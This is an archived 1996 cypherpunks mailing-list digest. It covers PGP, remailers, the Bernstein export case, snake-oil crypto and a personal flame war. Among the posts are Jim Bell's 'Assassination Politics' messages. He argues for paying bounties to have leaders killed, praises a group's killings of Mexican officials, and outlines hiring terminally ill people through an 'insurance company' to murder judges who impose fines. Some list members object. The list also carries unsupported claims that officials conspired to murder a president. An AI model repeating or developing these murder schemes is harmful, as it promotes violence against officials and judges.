>Hook up your new system to the Net, and use it to remake >yourself. Get a virtual nose ring. Program your avatar with >all the attributes you wish you had. On the Internet, your >image is up to you. What will yours be? Read Editor-in-Chief >Christopher Barr's views on online identity: > >http://www.cnet.com/Content/Voices/Barr/091696/index.html > >Maybe you're not ready to share your identity. Maybe that's >the furthest thing from your mind. If you've got secrets to >keep, you need to know about Pretty Good Privacy, the de >facto encryption standard for email. Our tutorial will tell >you how to get PGP software and how to use it: > >http://www.cnet.com/Content/Features/Howto/Privacy/index.html > >Then be sure to read our update on mover and shaker Philip >Zimmerman, the guy who invented PGP: > >http://www.cnet.com/Content/Voices/Movers/zimmermann.html --- Alan Olsen -- alano at teleport.com -- Contract Web Design & Instruction `finger -l alano at teleport.com` for PGP 2.6.2 key http://www.teleport.com/~alano/ "We had to destroy the Internet in order to save it." - Sen. Exon "Microsoft -- Nothing but NT promises." From jimbell at pacifier.com Sat Sep 21 18:29:37 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 22 Sep 1996 09:29:37 +0800 Subject: Kiddie porn on the Internet Message-ID: <199609212321.QAA07044@mail.pacifier.com> At 01:34 PM 9/21/96 -0400, hallam at vesuvius.ai.mit.edu wrote: > >[AP drivel deleted] > >Go talk to someone who is a member of an organisation like the PLO or >Hammas and pretty near the top. If you think that they would be intimidated >for a moment by AP you have another think comming. It depends entirely on what you mean by "intimidated." AP would make them pretty damn useless, because instead of the typical Palestiniation having to depend on a few corrupt self-chosen leaders, they could get their revenge on an individual basis. Who needs PLO or Hamas under such circumstances? 
Besides, the Israelis (as well as resentful Palestinians) could get rid of abusive PLO or Hamas leadership using AP. > >If it could the US would have assassinated Saddam by now. No, because the leadership in the US who would either choose such a system (or not) well understand that people who live in glass palaces shouldn't start throwing rocks against the enemy leadership. > It can't because it >is too difficult to find out where exactly a person will be. Assassination >attempts against Castro similarly failed. Assassination can easily fail if you don't give the proper people the motivation to accomplish the task. The key to having it work out is to ensure that the few people who have access to the target are sufficiently motivated to collect the reward. Who, exactly, was given a motivation to kill Castro? A few clowns in Miami? A few crooks in Jersey? Give _everybody_ who meets Castro during the day a $10 million motivation to kill him, and he'll be dead before sunset. >If you care to look at the history of Cambodia you will see that Lon Nol >assumed the presidency despite the knowledge that there was practically no >chance of defeating the Khmer Rouge and that he would almost certainly be dead >in less than a week as a result. > >Both the assumptions AP rests on are utterly false. It is neither possible >to assassinate people at will nor will it intimidate. Since it's never been tried before, how do you know? >In addition *ANYONE* who attempted to implement AP would be someone *I* >would regard as a tyrant and therefore a legitimate target by the rules >of AP. I don't doubt that there will be many people who misunderstand AP. You're obviously one of them. >I would naturally consider it permissible to engage the support of >others in their suppression. Since we now live in the fantasy land of AP >I can now wipe out anyone anywhere so I eliminate all AP leaders. > > >I think that this type of talk is incredibly dangerous.
There are plenty of >people on the net who are psychos and if you spread AP drivel around someone >is going to act on it. Probably not Jim Bell, more likely a psychopath who >lurks on the list but does not post. Pardon me, but what's wrong with this? Follow the news more closely, and you'll hear of a group which is operating in southern Mexico, the "EPR," which is killing off government employees, politicians, and police. True, they're not implementing the mathematical, digital-cash basis behind AP, but they seem to be making good progress against the corruption which is Mexico. Increase their productivity by a factor of 10, and the Mexican government would be terrified. Increase it by 100, and the Mexican government would fall within a few months. >If you call for people to be murdered - and let us not forget that this is >what AP is about you bear the responsibility when someone acts on it. Does that make YOU responsible if, by calling for people to NOT kill their oppressors, they continue to suffer oppression? >I consider AP to be very close to calling for the assassination of the >President of the USA. That is a federal crime and there is a law that >requires the investigation of any such threats. I suggest that people >think *very* carefully before engaging in this dangerous nonsense any >further. > > Phill >PS it is not censorship to stop people from advocating murder. Then you obviously don't understand the meaning of the word, "censorship." Jim Bell jimbell at pacifier.com From jimbell at pacifier.com Sat Sep 21 18:29:40 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 22 Sep 1996 09:29:40 +0800 Subject: Assassination Politics, was Kiddie porn on the Internet Message-ID: <199609212321.QAA07036@mail.pacifier.com> At 01:51 PM 9/17/96 -0700, Steve Schear wrote: >>On Mon, 16 Sep 1996, Steve Schear wrote: >> >>> Someone wrote: >>> We've all heard these arguments, but are they true? Who says so, and how >>> can they be certain?
Jim's suggestion has never, to my knowledge, been >>> tried on a consistent, large, scale. When all conventional alternatives >>> have been tried and fail, what have we or the starving children got to >>> lose? >> >>I think "Lord of the Flies" answers this question quite well. > >Does it? LOTF was fiction. Can you identify a recent instance in which a >non-governmental organization attempted to influence political/military >events via a concerted AP? As you understand, I really have to question anybody who would take an extraordinarily contrived work of fiction like LOTF and extrapolate from it as some sort of "answer" to AP. However, Unicorn is sufficiently confused that it's not surprising that this would come from him. While it's been well over two decades since I read it, LOTF engages in the artifice of separating out a handful of near-pre-adolescent boys, who don't seem to get along particularly well while stuck on an island after being shot down during a war. (Presumably, WWII.) It's hard to understand what kind of lesson we could learn from this, particularly since one person's opinion of what might happen should such an extraordinary and unlikely event occur can't be all that more significant or valuable than another. Or, what if such an event actually happened, and the outcome was quite different? What would that say about Golding's opinions? Or, suppose a similar event occurred, but instead of a dozen boys it was a co-ed college's students, or a few geriatrics, or a family, or a few middle-aged women, or...what? What, exactly, are we learning from one specific speculation that Golding happened to want to commit to paper? Unfortunately (or, perhaps _fortunately_?) I don't think we're going to hear from Unicorn why he thinks one particular dime novel is any more revelational about human behavior than any other. Jim Bell jimbell at pacifier.com From drose at AZStarNet.com Sat Sep 21 18:49:56 1996 From: drose at AZStarNet.com (David M.
Rose) Date: Sun, 22 Sep 1996 09:49:56 +0800 Subject: FCC's Hundt calls for univ service for Net, nixes iphone regs Message-ID: <199609212323.QAA23452@web.azstarnet.com> On Fri, 20 Sep 1996, Tim May wrote: [...] >The Constitutional issues of free speech would remain mostly unchanged even ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ >if "universal access" happens, but the government would definitely get more >of a foot in the door than it has now. I really hope that this is the case, and that some restraint would be exercised. But when the FCC has historically concerned itself with channels of communication, the 1st Am has typically been tossed out of the window. Recall the "seven dirty words" brouhaha. Perhaps they've lightened up. I can imagine Herr Hundt and his FCC fellows looking on fondly and indulgently as cute-as-a-button sitcom kids inform their network TV show parents more frequently than we've heard "fuckhead" on this list that they "suck." I seem to recall somewhere in the dim dark past that the expression "you suck" would have been subsumed under the "fighting words" statutes, implying, as it does, that the object of the utterer's scorn was either homosexual or a woman who casually performed fellation. If the FCC approves of "you suck" on network television, perhaps there is yet hope that the perverse topics daily discussed on c-punks would, at least temporarily, be allowed. Dave Rose drose at azstarnet.com ____________________________________ "Take this Uzi from a crack baby's hands, and put in a computer--that's our demands" -J. 
Jackson "Cover your mouth when you sneeze, that'll help the solution" -Mavis, Roebuck "Pops" Staples & the family From loki at infonex.com Sat Sep 21 18:55:31 1996 From: loki at infonex.com (Lance Cottrell) Date: Sun, 22 Sep 1996 09:55:31 +0800 Subject: Pseudonym server: Jenaer Anonymous Service In-Reply-To: <199609011109.NAA14105@jengate.thur.de> Message-ID: At 2:37 PM -0700 9/1/96, Lutz Donnerhacke wrote: >* stewarts at ix.netcom.com wrote: >It's strongly recomment to use a reply server to forward your requests to. >The server sends all outgoing messages via mixmaster chains. >(mixmaster at as-node.jena.thur.de can is always the first one in the chain). > This is very important. You don't want to send it your real address to deliver to. I strongly recommend using alt.anonymous.messages. A program called "newscan" is ideal for checking news based message pools. It scans news on a server of your choice, and saves messages based on criteria that you specify. -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From jimbell at pacifier.com Sat Sep 21 18:57:40 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 22 Sep 1996 09:57:40 +0800 Subject: Bernstein hearing: The Press Release Message-ID: <199609212340.QAA07773@mail.pacifier.com> At 02:03 PM 9/18/96 -0700, John Gilmore wrote: >Judge Patel to Decide if Government Restrictions on >Cryptography Violate the First Amendment >San Francisco, CA -- On Friday, September 20, 1996, Judge Marilyn Hall >Patel will hold hearings in a case with far-reaching implications for >personal privacy, U.S. 
competitiveness, and national security. Mathematician >Daniel J. Bernstein, a Research Assistant Professor in the Department of >Mathematics, Statistics and Computer Science at the University of Illinois at >Chicago, has sued several Federal agencies on the grounds that the >agencies' requirement that he obtain a license prior to publishing his >ideas about cryptography violates his First Amendment right to freedom >of speech. [trimmed] >LEGAL ARGUMENTS > >* Any legal framework that allows a government bureaucrat to >censor speech before it happens is an unconstitutional prior restraint. >The government is not allowed to set up such a drastic scheme >unless they can prove that publication of such information will >"surely result in direct, immediate, and irreparable damage to our >Nation or its people" and that the regulation at issue is necessary >to prevent this damage. At the risk of being a devil's advocate, let me suggest that you are conceding too much even with the preceding paragraph. The 1st amendment says nothing about preventing speech which (even admittedly) would result in "direct, immediate, and irreparable damage to our nation or its people." Indeed, if you follow the news over the last 5-10 years, you see numerous examples of news items getting publicized (sometimes 30-40 years late) which might arguably have cause "irreparable damage." That recent revelation about the POWs being left in Korea would have been one such example. The intentional detonation of that H-bomb in 1954, knowing that prevailing winds would shower thousands of people with fallout was another. The US military's experimentation with chemical weapons on our own people after WWII is another. The fraud of the Gulf of Tonkin Resolution is another. The Pentagon Papers incident is another. The Tuskeegee syphillis experiments on blacks which ended in 1972 was another. The massive pollution at decomissioned military bases. 
The Iran/Contra arms smuggling deals, along with the cocaine smuggling stories which are more recently being pursued, are yet another. I could list many more, but won't because of lack of space. But notice that, presumably, each and every one of these incidents was AT ONE TIME kept secret, arguably because it would be better for the country to do so. Thus, presumably it was thought or at least asserted that to reveal them would cause "damage to our nation or its people." The way you've written the paragraph I've quoted above, it appears that you are somehow acknowledging that there are certain circumstances where certain types of speech are controllable because they are "harmful," but you fail to explain how even this constitutional restriction is tolerable. Frankly, I don't see it! What you need to do is to be far more specific about such speech and exactly where it can be controlled. I should point out, also, that this is the second time I've mentioned this. You're doing us a disservice if you concede too much in this area. Jim Bell jimbell at pacifier.com From loki at infonex.com Sat Sep 21 18:59:31 1996 From: loki at infonex.com (Lance Cottrell) Date: Sun, 22 Sep 1996 09:59:31 +0800 Subject: Snake-Oil FAQ In-Reply-To: <199609180001.UAA24489@anon.lcs.mit.edu> Message-ID: I am setting up just such a list. I plan to award products for both excellent and lousy crypto. This really should be a committee (yuch) effort, so if you would like to participate, please let me know. -Lance At 5:01 PM -0700 9/17/96, Krenn wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >It would be nice to have a list of actual products which are deemed >potential snake-oil. Such a list could be maintained anonymously >through a nym to avoid all the annoying legal problems with commenting >on another's product. Though truth is the best defense against libel >charges, it would be very annoying to be sued or some such by some >hairbrained snake-oil peddler. 
> >Krenn > >-----BEGIN PGP SIGNATURE----- >Version: 2.6.2 > >iQCVAwUBMj84gEnqfwPpt/QVAQEWZAP9EZ7+3dQol+ZBLYQIiEk8f8avKDje5LBh >EmE5GVxFXDgD9wAmcccMMuVxxCaUhN0kc8Q4StQ4aZGjwdrCGouHq4aNJdd73ERP >vuk+VpQrlUwSvwwPlfXKUIQrM1PHfNigXrS5OrsQe/H/GjLw2lFa/WI2urR2Cuqg >oMmtuQKrJik= >=r2wq >-----END PGP SIGNATURE----- ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From loki at infonex.com Sat Sep 21 19:22:17 1996 From: loki at infonex.com (Lance Cottrell) Date: Sun, 22 Sep 1996 10:22:17 +0800 Subject: Snake-Oil FAQ In-Reply-To: <199609180001.UAA24489@anon.lcs.mit.edu> Message-ID: At 8:00 AM -0700 9/18/96, Mark Rogaski wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >An entity claiming to be Krenn wrote: >: >: It would be nice to have a list of actual products which are deemed >: potential snake-oil. Such a list could be maintained anonymously >: through a nym to avoid all the annoying legal problems with commenting >: on another's product. Though truth is the best defense against libel >: charges, it would be very annoying to be sued or some such by some >: hairbrained snake-oil peddler. >: > >I think a blacklist of that sort is inherently bad. I would much rather >have the public be able to RECOGNIZE SYMPTOMS of snake oil, rather than >just be spoon fed a list of good products vs. bad products. Pardon the >cliche, but if you give a man a fish ... etc, etc. > >mark > I agree in principle, but for the foreseeable future I think the list will be a "good thing". 
-Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From jya at pipeline.com Sat Sep 21 19:49:56 1996 From: jya at pipeline.com (John Young) Date: Sun, 22 Sep 1996 10:49:56 +0800 Subject: USA_exe (Kiddie porn on the Internet) Message-ID: <199609220023.AAA29950@pipe4.ny3.usa.pipeline.com> On Sep 21, 1996 16:19:53, 'jim bell ' wrote: >Pardon me, but what's wrong with this? Follow the news more closely, and >you'll hear of a group which is operating in southern Mexico, the "EPR," which >is killing off government employees, politicians, and police. True, they're >not implementing the mathematical, digital-cash basis behind AP, but they seem >to be making good progress against the corruption which is Mexico. >Increase their productivity by a factor of 10, and the Mexican government would >be terrified. Increase it by 100, and the Mexican government would fall within >a few months. Jim makes a good, if gruesome, point here, about the vicious realities of do-or-die AP, by even our own apple pie government. The Washington Post reports at length today on the Defense Department's disclosure yesterday of heretofore classified training manuals used in the School of the Americas to instruct Latino troops on killing a wide range of civilians for political purposes. 
To read "Army Instructed Latins On Executions, Torture," about your tax dollars working the AP angle: http://jya.com/usaexe.txt USA_exe From jya at pipeline.com Sat Sep 21 19:51:22 1996 From: jya at pipeline.com (John Young) Date: Sun, 22 Sep 1996 10:51:22 +0800 Subject: USA_exe (Kiddie porn on the Net) Message-ID: <199609220037.AAA23283@pipe2.ny1.usa.pipeline.com> On Sep 21, 1996 16:19:53, 'jim bell ' wrote: >Pardon me, but what's wrong with this? Follow the news more closely, and >you'll hear of a group which is operating in southern Mexico, the "EPR," which >is killing off government employees, politicians, and police. True, they're >not implementing the mathematical, digital-cash basis behind AP, but they seem >to be making good progress against the corruption which is Mexico. >Increase their productivity by a factor of 10, and the Mexican government would >be terrified. Increase it by 100, and the Mexican government would fall within >a few months. -------- Jim makes a good, if gruesome, point here, about the vicious realities of do-or-die AP, by even our own apple pie government. The Washington Post reports at length today on the Defense Department's disclosure yesterday of heretofore classified training manuals used in the School of the Americas to instruct Latino troops on killing a wide range of civilians for political purposes. To read "Army Instructed Latins On Executions, Torture," about your tax dollars working the AP angle: http://jya.com/usaexe.txt USA_exe From dthorn at gte.net Sat Sep 21 20:10:57 1996 From: dthorn at gte.net (Dale Thorn) Date: Sun, 22 Sep 1996 11:10:57 +0800 Subject: Kiddie porn on the Internet In-Reply-To: <9609211734.AA15897@vesuvius.ai.mit.edu> Message-ID: <32448DF8.5208@gte.net> hallam at vesuvius.ai.mit.edu wrote: > Go talk to someone who is a member of an organisation like the PLO or > Hamas and pretty near the top. If you think that they would be > intimidated for a moment by AP you have another think coming. 
> If it could the US would have assassinated Saddam by now. It can't > because it is too difficult to find out where exactly a person will > be. Assassination > attempts against Castro similarly failed. > If you care to look at the history of Cambodia you will see that Lon > Nol assumed the presidency despite the knowledge that there was > practically no chance of defeating the Khmer Rouge and that he would > almost certainly be dead > in less than a week as a result. > Both the assumptions AP rests on are utterly false. It is neither > possible to assassinate people at will nor will it intimidate. > In addition *ANYONE* who attempted to implement AP would be someone > *I* would regard as a tyrant and therefore a legitimate target by the > rules of AP. I would naturally consider it permissible to engage the > support of others in their suppression. Since we now live in the > fantasy land of AP I can now wipe out anyone anywhere so I eliminate > all AP leaders. > I think that this type of talk is incredibly dangerous. There are > plenty of people on the net who are psychos and if you spread AP > drivel around someone is going to act on it. Probably not Jim Bell, > more likely a psychopath who > lurks on the list but does not post. > If you call for people to be murdered - and let us not forget that > this is what AP is about you bear the responsibility when someone acts > on it. > I consider AP to be very close to calling for the assassination of the > President of the USA. That is a federal crime and there is a law that > requires the investigation of any such threats. I suggest that people > think *very* carefully before engaging in this dangerous nonsense any > further. Come now, surely you don't think putting assassination into the hands of the common people (Democracy, yes? The same stuff Clinton is preaching all the time, remember?) is going to be worse than letting governments control all the action? 
If you're going to allow governments to do the job, you and your fellow citizens should have been more involved in the political arena, to monitor these kinds of activities, so the government (of the U.S., for example) didn't have to get such a bad reputation. A few years ago, William Torbitt (pseudonym) wrote in part: "Penal codes have had two historic purposes - to deter crime and reform the offender. .....However, when the head of the National Police agency joins with a handful of other govt. leaders, and they both in turn throw in with organized crime to murder the president, and the people have an uneasy feeling that something of this nature has taken place, it is only natural that crime and violence increase, and the basic deterrent to crime has broken down." (quote approximate) From jimbell at pacifier.com Sat Sep 21 20:45:18 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 22 Sep 1996 11:45:18 +0800 Subject: The GAK Momentum is Building... Message-ID: <199609220058.RAA10810@mail.pacifier.com> At 01:58 PM 9/20/96 -0400, Black Unicorn wrote: >On Wed, 18 Sep 1996, Dale Thorn wrote: >> My comment: Once the big Corp.'s get used to the new game, they'll put >> the non-critical stuff out there for Mr. Freeh, and for the really >> secret data, if the cops confiscate anything they can't read, the Corp. >> security will put it off on a fall-guy, even as high as the CEO if >> necessary. I just wanna see one case where a federal judge will try to >> bleed a big company for contempt for "refusing" to decode and hand over >> some ostensibly encrypted data. Matter of fact, there are probably cases >> similar to this that have already been through the appeals courts. > >Several. Most involve foreign banks refusing to turn over records to U.S. >courts. Most result in powerfully large fines imposed on banks, often on >a per diem basis. But as usual, you ignore the obvious solution to the problem. Let's suppose the amount of the fine is set at $1000 per day. 
Actuarially, this works out to be the interest (at 5% per year) on $7.3 million dollars in principal. In other words, if you can eliminate the fine for less than $7.3 million, you're better off doing it. Naturally, you won't even consider the possibility of going outside the system to solve a problem. The rest of us notice that there are probably thousands of terminally-ill people who would gladly act as a human kamikaze and get rid of any judge inclined to impose such a fine, for a payment of 1% of this principal amount to a family member or loved one, leaving 99% available for the few other judges foolish enough to basically commit suicide by taking up a futile gesture. This kind of operation is best arranged by what might be described as an "insurance company," which will divide the risk among client companies until everyone learns what the score really is. It wouldn't take long before no such fines are ever imposed. But nah, this is much too complex for you. Jim Bell jimbell at pacifier.com From mblvd at telebase.com Sat Sep 21 21:12:45 1996 From: mblvd at telebase.com (mblvd at telebase.com) Date: Sun, 22 Sep 1996 12:12:45 +0800 Subject: Music Boulevard Birthday Sale - 10% Off! Message-ID: <199609220154.VAA21581@telebase.com.> Dear Music Boulevard User: Come to the Music Boulevard Birthday Blowout Sale! All CDs are 10% off of our already discounted prices. The sale is going on now, but will only last for a limited time, so make sure you visit http://www.musicblvd.com soon! The World Wide Web's ultimate online music store, Music Boulevard allows music lovers around the world to quickly and easily purchase products and learn about their favorite artists in an exciting and entertaining multimedia environment. Users can browse through a massive catalog of more than 150,000 different music titles, read artist biographies and discographies, check out album reviews, view cover artwork and listen to the Internet's largest selection of audio samples. 
Thank you, Music Boulevard Staff p.s. If you don't want to receive messages like this in the future, please send us a note at service at musicblvd.com with the word 'remove' in the subject line. From tcmay at got.net Sat Sep 21 21:13:35 1996 From: tcmay at got.net (Timothy C. May) Date: Sun, 22 Sep 1996 12:13:35 +0800 Subject: The GAK Momentum is Building... Message-ID: At 1:56 AM 9/22/96, jim bell wrote: >But as usual, you ignore the obvious solution to the problem. Let's suppose >the amount of the fine is set at $1000 per day. Actuarially, this works out .... >Naturally, you won't even consider the possibility of going outside the >system to solve a problem. The rest of us notice that there are probably >thousands of terminally-ill people who would gladly act as a human kamikaze ... I get the feeling that the "standard form letter" for all such invocations of AP is turning out to be: "Suppose you owe somebody money. It is much cheaper just to use AP to have him killed." Indeed, this "simple" solution is ever so much cheaper than paying a fine, repaying a loan, fulfilling an obligation, whatever. (P.S. The hiring of terminally-ill kamikazes is an old one.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Sat Sep 21 21:31:00 1996 From: tcmay at got.net (Timothy C. 
May) Date: Sun, 22 Sep 1996 12:31:00 +0800 Subject: William Torbitt (pseudonym) Message-ID: At 12:53 AM 9/22/96, Dale Thorn wrote: >A few years ago, William Torbitt (pseudonym) wrote in part: "Penal codes >have had two historic purposes - to deter crime and reform the offender. >.....However, when the head of the National Police agency joins with a >handful of other govt. leaders, and they both in turn throw in with >organized crime to murder the president, and the people have an uneasy >feeling that something of this nature has taken place, it is only >natural that crime and violence increase, and the basic deterrent to >crime has broken down." (quote approximate) Presumably the same William Torbitt (pseudonym) who wrote the Samizdat-distributed "Nomenclature of an Assassination Cabal." (One of the best treatments of the various swirling connections surrounding the JFK assassination and related CIA-Mob-Giancana-Hughes-Castro-etc. connections.) That Torbitt was a pseudonym has some connection to the themes of our list. It is believed by many--and it sounds plausible to me--that the actual author was a knowledgeable Texas attorney who had gained much familiarity with the facts of the case and, circa 1966-68, wrote his extended pamphlet "The Nomenclature of an Assassination Cabal." Fearing likely sanctions, both professional and personal, he chose not to use his real name, and the pamphlet circulated informally, without a formal publisher. (It is not written in a wacko-style, so I don't dismiss it as the ravings of a loon.) I haven't checked to see if it's on the Web. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From pgf at acadian.net Sat Sep 21 22:14:24 1996 From: pgf at acadian.net (Phil Fraering) Date: Sun, 22 Sep 1996 13:14:24 +0800 Subject: Death Threats In-Reply-To: Message-ID: On Sat, 21 Sep 1996, Timothy C. May wrote: ... > crime"? Don't I believe in free speech? Well, if I hear that Vladimir G. > Nulis says I should be killed, and that he is coming to California to take > care of this, I have no compunctions, liberrarian or otherwise, about > shooting first at the first sign of his appearance on my property. > Understandably, the government does not wish this to happen. Thus, I have > no problem with illegalizing direct and concrete threats. General threats, > such as "all lawyers should be taken out into the parking lot and garotted" > are not specific, direct, and concrete, and hence fall under the free > speech provisions.) I have heard of one person who was shot to death trying to visit a woman who had a restraining order against him. I don't think they even bothered trying to prosecute her; on the other hand, this isn't California... BTW, if you are a libberarian now, I suggest you use some sort of silencer. > --Tim May > > We got computers, we're tapping phone lines, I know that that ain't allowed. Where's that from? Phil Fraering "And the moral of the story is, pgf at acadian.net *never count your boobies until they 318/261-9649 are hatched*." 
- James Thurber, "The Unicorn in the Garden" From unicorn at schloss.li Sat Sep 21 22:21:22 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sun, 22 Sep 1996 13:21:22 +0800 Subject: Assassination Politics, was Kiddie porn on the Internet In-Reply-To: <199609212321.QAA07036@mail.pacifier.com> Message-ID: On Sat, 21 Sep 1996, jim bell wrote: > At 01:51 PM 9/17/96 -0700, Steve Schear wrote: > >>On Mon, 16 Sep 1996, Steve Schear wrote: > >> > >>> Someone wrote: > >>> We've all heard these arguments, but are they true? Who says so, and how > >>> can they be certain? Jim's suggestion has never, to my knowledge, been > >>> tried on a consistent, large, scale. When all conventional alternatives > >>> have been tried and fail, what have we or the starving children got to > >>> lose? > >> > >>I think "Lord of the Flies" answers this question quite well. > > > >Does it? LOTF was fiction. Can you identify a recent instance in which a > >non-governmental organization attempted to influence political/military > >events via a concerted AP? > > As you understand, I really have to question anybody who would take an > extraordinarily contrived work of fiction like LOTF and extrapolate from it > as some sort of "answer" to AP. However, Unicorn is sufficiently confused > that it's not surprising that this would come from him. > > While it's been well over two decades since I read it, LOTF engages in the > artifice of separating out a handful of near-pre-adolescent boys, who don't > seem to get along particularly well while stuck on an island after being > shot down during a war. (Presumably, WWII.) It's hard to understand what > kind of lesson we could learn from this, particularly since one person's > opinion of what might happen should such an extraordinary and unlikely event > occur can't be all that more significant or valuable than another. > > Or, what if such an event actually happened, and the outcome was quite > different? What would that say about Golding's opinions? 
Or, suppose a > similar event occurred, but instead of a dozen boys it was a co-ed college's > students, or a few geriatrics, or a family, or a few middle-aged women, > or...what? What, exactly, are we learning from one specific speculation > that Golding happened to want to commit to paper? > > Unfortunately (or, perhaps _fortunately_?) I don't think we're going to hear > from Unicorn why he thinks one particular dime novel is any more > revelational about human behavior than any other. Your "grasp" of literature gives the list my answer without me having to say a word. I notice you chose to ignore the factual political examples I gave. Not that this surprises me. "Your" concept, of rule by terror, has thousands of examples in historical context. I simply refuse to debate the matter any longer as it is clear you are not open to reasoned debate, nor, it would seem, are you clearly possessed of reason. > > Jim Bell > jimbell at pacifier.com > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From adam at homeport.org Sat Sep 21 22:22:28 1996 From: adam at homeport.org (Adam Shostack) Date: Sun, 22 Sep 1996 13:22:28 +0800 Subject: Where to write crypto? In-Reply-To: Message-ID: <199609220419.XAA14381@homeport.org> Dan McGuirk wrote: | On Sat, 21 Sep 1996, Dan McGuirk wrote: | > If I want to go to a country outside the United States to write | > cryptographic code that will be freely distributable, what's the best | > place to go? | | Or, on the other hand, is there no way that a U.S. citizen can legally do | this? That's not clear. The ITARs seem, on their face, to create a prior restraint on speech based on its content, and forbid Americans the right to leave the country to pursue their livelihoods. The odds of getting persecuted seem pretty low. As to the (predictable) comment that I'm not doing this, I'd be happy to entertain offers of crypto work that are not in the US, possibly leading to me being a test case. 
Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From dlv at bwalk.dm.com Sat Sep 21 22:25:20 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 22 Sep 1996 13:25:20 +0800 Subject: Timmy May's spam (Was: Re: CIA hacked) In-Reply-To: <199609211305.OAA00455@server.test.net> Message-ID: Adam Back writes: > > Dimitri Vulis writes: > > > [email reply protesting spam] > > > > You are confused. The above question was e-mailed to me by one of > > Timmy May's friends. > > What you were doing was confusing... how about attributing what people > have said to you, in the standard way? I was unsure what was going on > until you clarified here. Instead of including all the headers in > there with just a space between your headers and the quoted headers > (which makes it hard to follow, and makes one wonder if someone is > trying a crude forgery), use standard quoting conventions: > > Joe Blogss writes in private email: > > [quoted message body]... > > or similar? You're right - the forwarding mechanism I've been using so far just yanks in the spam e-mail without any processing. I will henceforth 1) Put the words 'Tim', 'May', and 'spam' in the subject line 2) Put some obvious ASCII prefix in front of the quotes. I apologize for any confusion. > > If you have any comments about Timmy May's friends not knowing > > English, trying to insult people, and posting non-crypto-relevant > > political rants, address them to Timmy May and his friends. > > It would seem to me that the first insults were thrown by yourself, > and that your strange habit of bouncing all the fallout to the list is > perpetuating the problem. No. Let me remind you the sequence of events, in chronological order: 1. Timmy May (who picked up a few popular PKC buzzwords, doesn't know anything about crypto, and isn't interested in learning) started spamming this mailing list with political rants 2. 
Most people who used to discuss crypto work on this mailing list have unsubscribed. 3. I pointed out a few examples of Tim making factually bogus claims in his rants. 4. Tim got very angry at me and started flaming me. I ignored him. 5. Tim posted a series of rants about me, attributing to me various nonsense I never said. I pointed out once that I never said it and then ignored him. 6. Recently it came to my attention that Tim's been contacting off-list various people in the computer security field and "complaining" about the politically incorrect things that I supposedly say on the Internet - except that he made up most of the "things" he complained about. 7. At this point I pointed out quite publicly that he's a liar. 8. Since that time, several friends of Tim May (or maybe Tim himself, using multiple accounts) have been sending me harassing e-mail, often by quoting my own cypherpunks articles and adding an obscenity. 9. Tim himself continues flaming me and telling lies about me (see his recent rant with the subject "death threats"). And you see, Timmy May is an obsessive liar and a vindictive nutcase. > If reporting to the list is accurate, I hear you have a PhD with a > subject related to crypto, so presumably you would have ample > knowledge to contribute technical crypto related thoughts. I'm sure > people would be interested in anything along those lines you cared to > contribute, and your reputation would benefit, I still hope to be able to discuss crypto on this mailing list (yes, my Ph.D. thesis was about crypto), but I see two problems: 1. A lot of people have already left this list, unwilling to be subjected to Tim May's rants, lies, and personal attacks. If I post something crypto- relevant to this mailing list, they won't see it. 2. Here's an example of the net-abuse being perpetrated by Tim May and his merry gang of mailbombers. I posted some crypto-relevant wire clippings to this mailing list. 
Either Tim (using an alternate account) or some pal of his e-mailed it back to me with an obscenity appended. ]> ]> Money Laundering Alert: August 1996 ]> ]> 'Unauthorized' Banks Pose Laundering Threat ]> ]> They are subject to none of the recordkeeping or reporting requirements ]> of the Bank Secrecy Act, receive no examinations from any banking ]> regulator, and may be on your bank's currency transaction reporting ]> exemption list. ]> ]> The Office of the Comptroller of the Currency refers to them as ]> "entities that may be conducting banking operations in the U.S. without ]> a license." Money launderers probably refer to them as dreams come true ]> and, unless legitimate financial institutions are alert, can use them to ]> place illicit proceeds into the financial system. ]> ]> They are "unauthorized" banks, and for the past five years the OCC has ]> been disseminating advisories to legitimate U.S. banks - but not to ]> consumers - in an effort to expose their existence and halt their ]> illegal operations. 
